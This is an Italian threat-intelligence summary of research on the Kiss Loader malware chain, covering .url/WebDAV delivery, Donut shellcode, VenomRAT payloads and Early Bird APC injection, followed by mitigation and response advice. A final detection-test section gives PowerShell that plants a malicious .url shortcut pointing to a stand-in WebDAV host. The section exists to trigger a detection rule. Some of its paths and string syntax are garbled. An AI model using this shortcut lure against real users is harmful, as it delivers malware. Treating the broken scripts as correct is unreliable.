Quando il Malware Risponde: Interazione in Tempo Reale con un Attore di Minaccia Durante l’Analisi di Kiss Loader

Sommario

Ricerca di G DATA Security Center esamina un nuovo loader identificato chiamato Kiss Loader. L’articolo esamina un nuovo loader identificato chiamato Kiss Loader, distribuito tramite un collegamento Windows che punta a un repository WebDAV esposto tramite un tunnel TryCloudflare. Una volta avviato, il loader decripta il shellcode generato da Donut, recupera payloads come VenomRAT e un componente Kryptik, e li esegue tramite iniezione Early Bird APC in explorer.exe. Durante l’analisi, il ricercatore ha sperimentato interazione diretta con l’operatore malware attraverso una finestra di Notepad, che ha confermato l’uso del metodo di iniezione Early Bird. Il caso sottolinea la rapida evoluzione dello strumento e la necessità di un forte contenimento quando si maneggiano malware attivi.

Indagine

I ricercatori hanno attivato il collegamento iniziale in un laboratorio controllato e tracciato la catena di esecuzione tramite uno script WSH, componente JScript, file batch e un loader basato su Python. Hanno confermato l’uso del shellcode generato da Donut, estratto i payload incorporati e documentato il metodo di iniezione finale, che mette in coda un APC in un processo sospeso explorer.exe processo. Durante tutta la sessione, il team ha catturato dettagliati output di runtime e messaggi degli sviluppatori lasciati all’interno del flusso di malware. Un breve scambio in tempo reale con l’operatore ha ulteriormente confermato sia la tecnica sia lo stato di sviluppo attivo del loader.

Mitigazione

Le organizzazioni dovrebbero restringere o ispezionare il traffico WebDAV consegnato tramite piattaforme di tunneling pubbliche come TryCloudflare, disabilitare l’esecuzione automatica di .url file di collegamenti, e applicare rigorosi controlli di esecuzione a script e file batch nei percorsi di avvio accessibili agli utenti. Le difese endpoint dovrebbero rilevare il comportamento di iniezione Early Bird APC e monitorare i processi sospesi che ricevono APC in coda. Le whitelist delle applicazioni dovrebbero anche essere mantenute aggiornate per bloccare loader Python sconosciuti e shellcode basati su Donut.

Risposta

Se viene rilevata attività di Kiss Loader, isolare immediatamente l’endpoint, terminare eventuali explorer.exe processi sospetti avviati in uno stato sospeso, e catturare la memoria per l’analisi forense. Gli investigatori dovrebbero identificare e bloccare l’infrastruttura WebDAV correlata, esaminare l’host per VenomRAT, Kryptik e qualsiasi payload aggiuntivo depositato, e ruotare le credenziali potenzialmente esposte. I log dovrebbero quindi essere rivisti per altri tentativi di intrusione e le regole di rilevamento dovrebbero essere aggiornate con tutti i nuovi indicatori osservati.

Esecuzione della Simulazione

Prerequisito: il Check Pre-volo di Telemetria e Baseline deve essere superato.

• Narrazione dell’Attacco e Comandi:
  Un attaccante con accesso limitato alla workstation della vittima vuole stabilire un punto d’appoggio per il movimento laterale. Creano un collegamento Internet di Windows dannoso chiamato DKM_DE000922.pdf.url che punta a una condivisione WebDAV dannosa (http://malicious.example.com/webdav/evil.pdf). Quando un utente fa doppio clic sul collegamento, il sistema tenta automaticamente di montare la risorsa WebDAV, causando il download del payload senza eseguire un binario tradizionale. La creazione di questo collegamento genera un evento di creazione file che corrisponde alla regola di rilevamento.

  powershell
  # Percorso in cui verrà rilasciato il collegamento (ad esempio, Desktop dell'utente)
  $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  
  # Contenuto del file .url dannoso che punta a una condivisione WebDAV
  $maliciousContent = @"

  [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@

  # Scrive il file – questa azione dovrebbe attivare la regola di rilevamento
  Set-Content -Path $maliciousPath -Value $maliciousContent -Encoding ASCII
  

• Script di Test di Regressione: Lo script qui sotto riproduce i passi esatti necessari per generare la telemetria che attiva il rilevamento.

  powershell
  # ---------------------------------------------------------
  # Test di Regressione – Attiva la regola Sigma per file .url WebDAV
  # ---------------------------------------------------------
  
  # 1. Definisce la posizione di destinazione (desktop per l'utente corrente)
  $targetFile = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  
  # 2. Costruisce il contenuto del collegamento dannoso
  $urlPayload = @"

  [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@

  # 3. Scrive il collegamento (questo genererà un evento FileCreazione)
  Set-Content -Path $targetFile -Value $urlPayload -Encoding ASCII
  
  Write-Host "Collegamento .url dannoso creato in $targetFile"
  

• Comandi di Pulizia: Rimuovere il collegamento dannoso dopo la verifica.

  powershell
  $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  if (Test-Path $maliciousPath) {
      Remove-Item -Path $maliciousPath -Force
      Write-Host "Collegamento dannoso ripulito."
  } else {
      Write-Host "Nessun collegamento dannoso trovato; nulla da ripulire."
  }